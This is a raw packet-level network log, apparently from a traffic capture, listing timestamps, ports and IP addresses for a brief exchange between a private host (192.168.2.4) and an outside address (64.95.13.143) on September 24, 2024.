Sep 24, 2024 17:46:11.951323986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951329947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951335907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951340914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951348066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951359034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951359987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951373100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951400995 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951437950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951461077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951477051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951478958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951483011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951488972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951512098 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951538086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.952178001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.952184916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.952224970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.004399061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004415989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004441977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004447937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004460096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004466057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.004537106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.004581928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.005959988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.005971909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.006027937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.033792973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033838034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033863068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033871889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033885956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033893108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033909082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.033947945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.033983946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.035764933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035823107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.035913944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035953045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035962105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035969973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035983086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035991907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.035996914 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036001921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036010981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036014080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036020041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036029100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036047935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036051989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036062956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036065102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036073923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036084890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036098003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036113024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036118984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036130905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036134005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036147118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036159992 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036163092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036173105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036190033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036202908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036204100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036218882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036233902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036241055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036257029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036262035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036262989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036277056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036281109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036286116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036293983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.036305904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.036338091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.037139893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037151098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037163973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037169933 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037175894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037188053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037194014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037206888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037211895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037218094 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.037218094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.037239075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.037261009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.038034916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038043022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038053036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038059950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038077116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038081884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038088083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038093090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.038094997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038101912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038114071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038120031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038131952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.038162947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.038942099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038953066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038959026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038969994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038975954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038983107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.038994074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039006948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039006948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039016008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039020061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039024115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039036989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039046049 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039067030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039813042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039824963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039829969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039835930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039846897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039858103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039860964 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039860964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039871931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039875031 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039879084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039890051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039891958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039895058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.039907932 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.039932013 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.040705919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040725946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040733099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040745020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040750027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040755987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040756941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.040761948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040769100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040781021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040786982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040791988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.040792942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.040827036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.041502953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041512012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041522980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041529894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041541100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041547060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041553020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041563988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041568995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041574955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041574955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.041587114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041594028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041596889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.041605949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041613102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041616917 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.041620016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.041635990 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.041649103 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.091888905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.096986055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.096997976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097012043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097045898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097052097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097064972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.097103119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.097179890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097187996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097199917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.097225904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.097251892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.097508907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124469995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124485970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124491930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124502897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124509096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124515057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124526978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124533892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.124540091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.124540091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.124600887 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.126920938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.126967907 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.126988888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.126995087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127043009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127043009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127048969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127059937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127085924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127262115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127304077 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127324104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127330065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127341986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127346992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127361059 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127403975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127583027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127588987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127599955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127605915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127612114 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127618074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127624989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127666950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.127959967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127965927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127970934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127976894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127981901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127986908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.127994061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128009081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.128031015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.128500938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128506899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128511906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128518105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128528118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128534079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128544092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.128544092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128551006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128563881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.128576040 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.128601074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.129141092 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129153013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129163980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129168987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129187107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129189968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.129193068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129206896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129211903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129216909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129221916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129223108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.129232883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129239082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129239082 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.129245043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.129261017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.129276991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.130031109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130037069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130048037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130053043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130058050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130063057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130074024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130079031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130095959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130098104 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.130099058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130109072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130119085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130120993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130127907 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.130141020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.130166054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.130985975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.130992889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131004095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131009102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131015062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131026030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131031036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131036997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131047010 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131047964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131053925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131057024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131066084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131072044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131077051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131078959 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131083012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131093979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131098986 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131120920 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131146908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131933928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131939888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131951094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131957054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131962061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131973028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131978035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131983042 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131989002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131992102 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.131994009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.131999969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132005930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132006884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.132011890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132042885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.132065058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.132581949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132662058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132667065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132678986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132683992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132688999 CEST	1120	49730	64.95.13.143	192.168.2.4
